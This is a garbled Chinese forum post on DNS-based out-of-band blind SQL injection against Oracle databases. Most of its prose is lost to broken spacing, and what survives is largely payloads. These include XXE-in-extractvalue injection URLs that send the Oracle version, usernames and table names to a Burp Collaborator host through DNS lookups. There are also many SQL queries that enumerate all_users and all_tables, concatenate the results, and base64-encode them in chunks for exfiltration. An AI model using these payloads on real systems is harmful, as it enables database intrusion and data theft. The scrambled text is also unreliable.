[29002] 2021-06-10_Oracle中基于DNS的带外SQL盲注—转储数据

文档创建者:s7ckTeam
浏览次数:3
最后更新:2025-01-19
2021-06-10_Oracle中基于DNS的带外SQL盲注—转储数据 O r a c l e     D N S     S Q L       O t s   2 0 2 1 - 0 6 - 1 0   S Q L     D N S     H T T P   使 O r a c l e     I n t e r n e t   B u r p     S Q L i   D N   S 使   O r a c l e     D N S   B u r p   使   S Q L i   S Q L i   W e b     D N S     B u r p     S Q L     B u r p   C o l l a b o r a t o r     D N S   怀 | |     O r a c l e   d b     S Q L   p a y l o a d O r a c l e   O r a c l e   使 | |   使   S Q L   h t t p s : / / s q l w i k i . n e t s p i . c o m / d b m s I d e n t i f i c a t i o n / # o r a c l e   P a y l o a d A l l t h e T h i n g s   g i t h u b   r e p o   . 使   O r a c l e     X M L     X X E     D N S     S Q L     P O C     B u r p   C o l l a b o r a t o r   ' . '   使 | |     v $ v e r s i o n   [   U R L   ]   B u r p     O r a c l e     (   h t t p s : / / l i v e s q l . o r a c l e . c o m /   ) h t t p : / / w e b s i t e . c o m / s o m e s e a r c h - e n d p o i n t ? q = % 2 c % 2 0 ( s e l e c t   e x t r a c t v a l u e ( x m l t y p e ( ' < ? x m l   v e r s i o n = " 1 . 0 "   e n c o d i n g = " U T F - 8 " ? > < ! D O C T Y P E   r o o t   [   < ! E N T I T Y   %   t a e y j   S Y S T E M   " h t t p : / / a d f d l o n g r a n d o m b u r p c o l l a b s t r i n g j f l f . b u r p c o l l a b ' | | ' o r a t o r . n e t / " > % t a e y j ; ] > ' ) , ' / l ' )   f r o m   d u a l ) s e a r c h ? q = h t t p : / / l o n g r a n d o m b u r p s t r i n g . b u r p c o l l a b o r a t o r . n e t h t t p s : / / p o r t s w i g g e r . n e t / w e b - s e c u r i t y / s q l - i n j e c t i o n / c h e a t - s h e e t h t t p s : / / g i t h u b . c o m / s w i s s k y r e p o / P a y l o a d s A l l T h e T h i n g s / b l o b / m a s t e r / S Q L % 2 0 I n j e c t i o n / O r a c l e S Q L % 2 0 I n j e c t i o n . m d h t t p : / / p e n t e s t m o n k e y n e t / c h e a t - s h e e t / s q l - i n j e c t i o n / o r a c l e - s q l - i n j e c t i o n - c h e a t - s h e e t h t t p s : / / z e n o d o . o r g / r e c o r d / 3 5 5 6 3 4 7 / f i l e s / A % 2 0 S t u d y % 2 0 o f % 2 0 O u t - o f - B a n d % 2 0 S Q L % 2 0 I n j e c t i o n . p d f   ? = 1 h t t p : / / w e b s i t e . c o m / s o m e s e a r c h - e n d p o i n t ? q = % 2 c % 2 0 ( s e l e c t   e x t r a c t v a l u e ( x m l t y p e ( ' < ? x m l   v e r s i o n = " 1 . 0 "   e n c o d i n g = " U T F - 8 " ? > < ! D O C T Y P E   r o o t   [   < ! E N T I T Y   %   t a e y j   S Y S T E M   " h t t p : / / ' | | ( s e l e c t   b a n n e r   f r o m   v $ v e r s i o n ) | | ' . a d f d l o n g r a n d o m b u r p c o l l a b s t r i n g j f l f . b u r p c o l l a b ' | | ' o r a t o r . n e t / " > % t a e y j ; ] > ' ) , ' / l ' )   f r o m   d u a l )
  D N S   使   S Q L     D N S     D N S   使 / / - 使   R E P L A C E ( )     ' . '   使   H E X     B a s e 6 4   U T L _ R A W . C A S T _ T O _ V A R C H A R 2 ( ) u t l _ e n c o d e . b a s e 6 4 _ e n c o d e ( ) u t l _ r a w . c a s t _ t o _ r a w ( ) h t t p s : / / d b a . s t a c k e x c h a n g e . c o m / q u e s t i o n s / 1 2 8 9 0 5 / w h a t - i s - a - b a s e 6 4 - r a w - h o w - d o - i - u s e - i t   2 5 3     6 3   使   6 3   使   3 0 - 4 0   使   S U B S T R ( )     B u r p   C o l l a b o r a t o r     D N S     S Q L i     v $ v e r s i o n   $   b u r p   c o l l a b o r a t o r   S Y S 使 w h e r e   r o w n u m = 2   B u r p   C o l l a b o r a t o r   h t t p s : / / s t a c k o v e r f l o w . c o m / q u e s t i o n s / 9 6 7 9 0 5 1 / w h y - o p e r a t o r - d o e s n t - w o r k - w i t h - r o w n u m - o t h e r - t h a n - f o r - v a l u e - 1 / 9 6 7 9 0 9 9 o r a c l e 使 r o w n u m = 2 使 使 ( s e l e c t   e x t r a c t v a l u e ( x m l t y p e ( ' < ? x m l   v e r s i o n = " 1 . 0 "   e n c o d i n g = " U T F - 8 " ? > < ! D O C T Y P E   r o o t   [   < ! E N T I T Y   %   c g g n v   S Y S T E M   " h t t p : / / ' | | ( S E L E C T   r e p l a c e ( r e p l a c e ( u s e r n a m e ,   "   " , " - " ) , " $ " , " - " )   F R O M   a l l _ u s e r s   w h e r e   r o w n u m = 1 ) | | ' . s e a l o n g r a n d o m c o l l a b s t r i n g a i . b u r p c o l l a b ' | | ' o r a t o r . n e t / " > % c g g n v ; ] > ' ) , ' / l ' )   f r o m   d u a l ) ( S E L E C T   r e p l a c e ( r e p l a c e ( u s e r n a m e ,   "   " , " - " ) , " $ " , " - " )   F R O M   a l l _ u s e r s   w h e r e   r o w n u m = 1 ) ( S E L E C T   r e p l a c e ( r e p l a c e ( u s e r n a m e ,   "   " , " - " ) , " $ " , " - " )   F R O M   a l l _ u s e r s   w h e r e   r o w n u m = 1 ) ( S E L E C T   u s e r n a m e   F R O M   a l l _ u s e r s   w h e r e   r o w n u m = 1 ) ( S E L E C T   u s e r n a m e   F R O M   ( S E L E C T   u s e r n a m e ,   r o w n u m   a s   r n   F R O M   a l l _ u s e r s   o r d e r   b y   u s e r n a m e   a s c )   w h e r e   r n = 2 )
使   B u r p   C o l l a b o r a t o r   广 使 $ 使   ( D I O S )   B u r p   C o l l a b o r a t o r   使   P y t h o n     S Q L m a p     D N S     O O B     D N S   使 O r a c l e     l i s t a g g ( ) s t r a g g ( )     w l _ c o n c a t ( )   使   S t a c k o v e r f l o w   A n s w e r s   使   l i s t a g g ( )   使 w h e r e   r n < =   1 0 ( s e l e c t   o w n e r   f r o m   ( s e l e c t   o w n e r ,   r o w n u m   a s   r n   f r o m   ( s e l e c t   D I S T I N C T   o w n e r   f r o m   a l l _ t a b l e s   o r d e r   b y   o w n e r   a s c ) )   w h e r e   r n = 1   ) ( s e l e c t   o w n e r   f r o m   ( s e l e c t   o w n e r ,   r o w n u m   a s   r n   f r o m   ( s e l e c t   D I S T I N C T   o w n e r   f r o m   a l l _ t a b l e s   o r d e r   b y   o w n e r   a s c ) )   w h e r e   r n = 2   ) ( s e l e c t   t a b l e _ n a m e   f r o m   ( s e l e c t   t a b l e _ n a m e , r o w n u m   a s   r n   f r o m   a l l _ t a b l e s   o r d e r   b y   t a b l e _ n a m e   a s c ) r n   w h e r e   r n = 1 ) D U A L U S E R _ P R I V I L E G E _ M A P . . .   ( s e l e c t   r e p l a c e ( r e p l a c e ( ( t a b l e _ n a m e ) , '   ' , ' - ' ) , ' $ ' , ' - ' )   f r o m   ( s e l e c t   t a b l e _ n a m e , r o w n u m   a s   r n   f r o m   a l l _ t a b l e s   o r d e r   b y   t a b l e _ n a m e   a s c ) r n   w h e r e   r n = 1 ) s e l e c t   l t r i m ( s y s _ c o n n e c t _ b y _ p a t h ( u s e r n a m e ,   ' - ' ) , ' - ' ) a s   s t   F R O M   ( S E L E C T   u s e r n a m e ,   R O W _ N U M B E R   ( )   O V E R   ( O R D E R   B Y   u s e r n a m e )   r n ,   C O U N T   ( * )   O V E R   ( )   c n t   F R O M   a l l _ u s e r s )   W H E R E   r n   =   c n t   S T A R T   W I T H   r n   =   1   C O N N E C T   B Y   r n   =   P R I O R   r n + 1 ; s e l e c t   l t r i m ( s y s _ c o n n e c t _ b y _ p a t h ( u s e r n a m e ,   ' - ' ) , ' - ' ) a s   s t   F R O M   ( S E L E C T   u s e r n a m e ,   R O W _ N U M B E R   ( )   O V E R   ( O R D E R   B Y   u s e r n a m e )   r n ,   C O U N T   ( * )   O V E R   ( )   c n t   F R O M   a l l _ u s e r s   w h e r e   r o w n u m < =   1 0 )   W H E R E   r n   =   c n t   S T A R T   W I T H   r n   =   1   C O N N E C T   B Y   r n   =   P R I O R   r n + 1 ;
线   ( - )     ( $ ) 使   R E P L A C E ( )     4 0     D N S     B a s e 6 4     H E X / B a s e 6 4   =   B u r p   r n = 1 2   4 0     B a s e 6 4   ( - )     ( = , / , + ) s e l e c t   s u b s t r ( r e p l a c e ( r e p l a c e ( l t r i m ( s y s _ c o n n e c t _ b y _ p a t h ( u s e r n a m e ,   ' - ' ) , ' - ' ) , ' _ ' , ' - ' ) , ' $ ' , ' - ' ) , 2 , 4 0 ) a s   s t   F R O M   ( S E L E C T   u s e r n a m e ,   R O W _ N U M B E R   ( )   O V E R   ( O R D E R   B Y   u s e r n a m e )   r n ,   C O U N T   ( * )   O V E R   ( )   c n t   F R O M   a l l _ u s e r s   w h e r e   r o w n u m < = 4 0 )   W H E R E   r n   =   c n t   S T A R T   W I T H   r n   =   1   C O N N E C T   B Y   r n   =   P R I O R   r n + 1 ; s e l e c t   s u b s t r ( r e p l a c e ( r e p l a c e ( l t r i m ( s y s _ c o n n e c t _ b y _ p a t h ( u s e r n a m e ,   ' - ' ) , ' - ' ) , ' _ ' , ' - ' ) , ' $ ' , ' - ' ) , 2 , 4 0 ) a s   s t   F R O M   ( S E L E C T   u s e r n a m e ,   R O W _ N U M B E R   ( )   O V E R   ( O R D E R   B Y   u s e r n a m e )   r n ,   C O U N T   ( * )   O V E R   ( )   c n t   F R O M   a l l _ u s e r s   w h e r e   r o w n u m < = 4 0 )   W H E R E   r n   =   c n t   S T A R T   W I T H   r n   =   1   C O N N E C T   B Y   r n   =   P R I O R   r n + 1 ; s e l e c t   u s e r n a m e   F R O M   a l l _ u s e r s   w h e r e   r o w n u m = 1 / / R e p l a c i n g   b a d   c h a r s s e l e c t   r e p l a c e ( r e p l a c e ( r e p l a c e ( u s e r n a m e , "   " , " - " ) , " $ " , " - " ) , " _ " ,   " - " )   F R O M   a l l _ u s e r s   w h e r e   r o w n u m = 1 ( S E L E C T   r e p l a c e ( r e p l a c e ( r e p l a c e ( u s e r n a m e ,   "   " , " - " ) , " $ " , " - " ) , " _ " ,   " - " )   F R O M   ( S E L E C T   u s e r n a m e ,   r o w n u m   a s   r n   F R O M   a l l _ u s e r s   o r d e r   b y   u s e r n a m e   a s c )   w h e r e   r n = 1 ) ( s e l e c t   r e p l a c e ( r e p l a c e ( r e p l a c e ( o w n e r , "   " , " - " ) , " $ " , " - " ) , " _ " , " - " )   f r o m   ( s e l e c t   o w n e r ,   r o w n u m   a s   r n   f r o m   ( s e l e c t   D I S T I N C T   o w n e r   f r o m   a l l _ t a b l e s   o r d e r   b y   o w n e r   a s c ) )   w h e r e   r n = 1 ) ( s e l e c t   r e p l a c e ( r e p l a c e ( r e p l a c e ( t a b l e _ n a m e , "   " , " - " ) , " $ " , " - " ) , " _ " ,   " - " )   f r o m   ( s e l e c t   t a b l e _ n a m e , r o w n u m   a s   r n   f r o m   a l l _ t a b l e s   o r d e r   b y   t a b l e _ n a m e   a s c ) r n   w h e r e   r n = 1 ) s e l e c t   s u b s t r ( r e p l a c e ( r e p l a c e ( r e p l a c e ( l t r i m ( s y s _ c o n n e c t _ b y _ p a t h ( u s e r n a m e ,   ' - ' ) , ' - ' ) , ' _ ' , ' - ' ) , ' $ ' , ' - ' ) , '   ' , ' - ' ) , 2 , 4 0 ) a s   s t   F R O M   ( S E L E C T   u s e r n a m e ,   R O W _ N U M B E R   ( )   O V E R   ( O R D E R   B Y   u s e r n a m e )   r n ,   C O U N T   ( * )   O V E R   ( )   c n t   F R O M   a l l _ u s e r s   w h e r e   r o w n u m < =   4 0 )   W H E R E   r n   =   c n t   S T A R T   W I T H   r n   =   1   C O N N E C T   B Y   r n   =   P R I O R   r n + 1 ; s e l e c t   s u b s t r ( r e p l a c e ( r e p l a c e ( r e p l a c e ( l t r i m ( s y s _ c o n n e c t _ b y _ p a t h ( o w n e r ,   ' - ' ) , ' - ' ) , ' _ ' , ' - ' ) , ' $ ' , ' - ' ) , '   ' , ' - ' ) , 2 , 4 0 ) a s   s t   F R O M   ( S E L E C T   o w n e r ,   R O W _ N U M B E R   ( )   O V E R   ( O R D E R   B Y   o w n e r )   r n ,   C O U N T   ( * )   O V E R   ( )   c n t   F R O M   a l l _ t a b l e s   w h e r e   r o w n u m < =   4 0 )   W H E R E   r n   =   c n t   S T A R T   W I T H   r n   =   1   C O N N E C T   B Y   r n   =   P R I O R   r n + 1 ; s e l e c t   s u b s t r ( r e p l a c e ( r e p l a c e ( r e p l a c e ( l t r i m ( s y s _ c o n n e c t _ b y _ p a t h ( t a b l e _ n a m e ,   ' - ' ) , ' - ' ) , ' _ ' , ' - ' ) , ' $ ' , ' - ' ) , '   ' , ' - ' ) , 2 , 4 0 ) a s   s t   F R O M   ( S E L E C T   t a b l e _ n a m e ,   R O W _ N U M B E R   ( )   O V E R   ( O R D E R   B Y   t a b l e _ n a m e )   r n ,   C O U N T   ( * )   O V E R   ( )   c n t   F R O M   a l l _ t a b l e s   w h e r e   r o w n u m < =   4 0 )   W H E R E   r n   =   c n t   S T A R T   W I T H   r n   =   1   C O N N E C T   B Y   r n   =   P R I O R   r n + 1 ; s e l e c t   r e p l a c e ( r e p l a c e ( r e p l a c e ( U T L _ R A W . C A S T _ T O _ V A R C H A R 2 ( u t l _ e n c o d e . b a s e 6 4 _ e n c o d e ( u t l _ r a w . c a s t _ t o _ r a w ( s u b s t r ( l t r i m ( s y s _ c o n n e c t _ b y _ p a t h ( u s e r n a m e , ' - ' ) , ' - ' ) , 2 , 4 0 ) ) ) ) , ' = ' , ' - ' ) , '   ' , ' - ' ) , ' / ' , ' - ' ) a s   s t   F R O M   ( S E L E C T   u s e r n a m e ,   R O W _ N U M B E R   ( )   O V E R   ( O R D E R   B Y   u s e r n a m e )   r n ,   C O U N T   ( * )   O V E R   ( )   c n t   F R O M   a l l _ u s e r s   w h e r e   r o w n u m < =   4 0 )   W H E R E   r n   =   c n t   S T A R T   W I T H   r n   =   1   C O N N E C T   B Y   r n   =   P R I O R   r n + 1 ;
  O r a c l e   使   s e l e c t   r e p l a c e ( r e p l a c e ( r e p l a c e ( U T L _ R A W . C A S T _ T O _ V A R C H A R 2 ( u t l _ e n c o d e . b a s e 6 4 _ e n c o d e ( u t l _ r a w . c a s t _ t o _ r a w ( s u b s t r ( l t r i m ( s y s _ c o n n e c t _ b y _ p a t h ( u s e r n a m e , ' - ' ) , ' - ' ) , 2 , 4 0 ) ) ) ) , ' = ' , ' - ' ) , '   ' , ' - ' ) , ' / ' , ' - ' ) a s   s t   F R O M   ( S E L E C T   u s e r n a m e ,   R O W _ N U M B E R   ( )   O V E R   ( O R D E R   B Y   u s e r n a m e )   r n ,   C O U N T   ( * )   O V E R   ( )   c n t   F R O M   a l l _ u s e r s   w h e r e   r o w n u m < =   4 0 )   W H E R E   r n   =   c n t   S T A R T   W I T H   r n   =   1   C O N N E C T   B Y   r n   =   P R I O R   r n + 1 ; s e l e c t   r e p l a c e ( r e p l a c e ( r e p l a c e ( U T L _ R A W . C A S T _ T O _ V A R C H A R 2 ( u t l _ e n c o d e . b a s e 6 4 _ e n c o d e ( u t l _ r a w . c a s t _ t o _ r a w ( s u b s t r ( l t r i m ( s y s _ c o n n e c t _ b y _ p a t h ( o w n e r , ' - ' ) , ' - ' ) , 2 , 4 0 ) ) ) ) , ' = ' , ' - ' ) , '   ' , ' - ' ) , ' / ' , ' - ' ) a s   s t   F R O M   ( S E L E C T   o w n e r ,   R O W _ N U M B E R   ( )   O V E R   ( O R D E R   B Y   o w n e r )   r n ,   C O U N T   ( * )   O V E R   ( )   c n t   F R O M   a l l _ t a b l e s   w h e r e   r o w n u m < =   4 0 )   W H E R E   r n   =   c n t   S T A R T   W I T H   r n   =   1   C O N N E C T   B Y   r n   =   P R I O R   r n + 1 ; s e l e c t   r e p l a c e ( r e p l a c e ( r e p l a c e ( U T L _ R A W . C A S T _ T O _ V A R C H A R 2 ( u t l _ e n c o d e . b a s e 6 4 _ e n c o d e ( u t l _ r a w . c a s t _ t o _ r a w ( s u b s t r ( l t r i m ( s y s _ c o n n e c t _ b y _ p a t h ( t a b l e _ n a m e ,   ' - ' ) , ' - ' ) , 2 , 4 0 ) ) ) ) , ' = ' , ' - ' ) , '   ' , ' - ' ) , ' / ' , ' - ' ) a s   s t   F R O M   ( S E L E C T   t a b l e _ n a m e ,   R O W _ N U M B E R   ( )   O V E R   ( O R D E R   B Y   t a b l e _ n a m e )   r n ,   C O U N T   ( * )   O V E R   ( )   c n t   F R O M   a l l _ t a b l e s   w h e r e   r o w n u m < =   4 0 )   W H E R E   r n   =   c n t   S T A R T   W I T H   r n   =   1   C O N N E C T   B Y   r n   =   P R I O R   r n + 1 ;
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则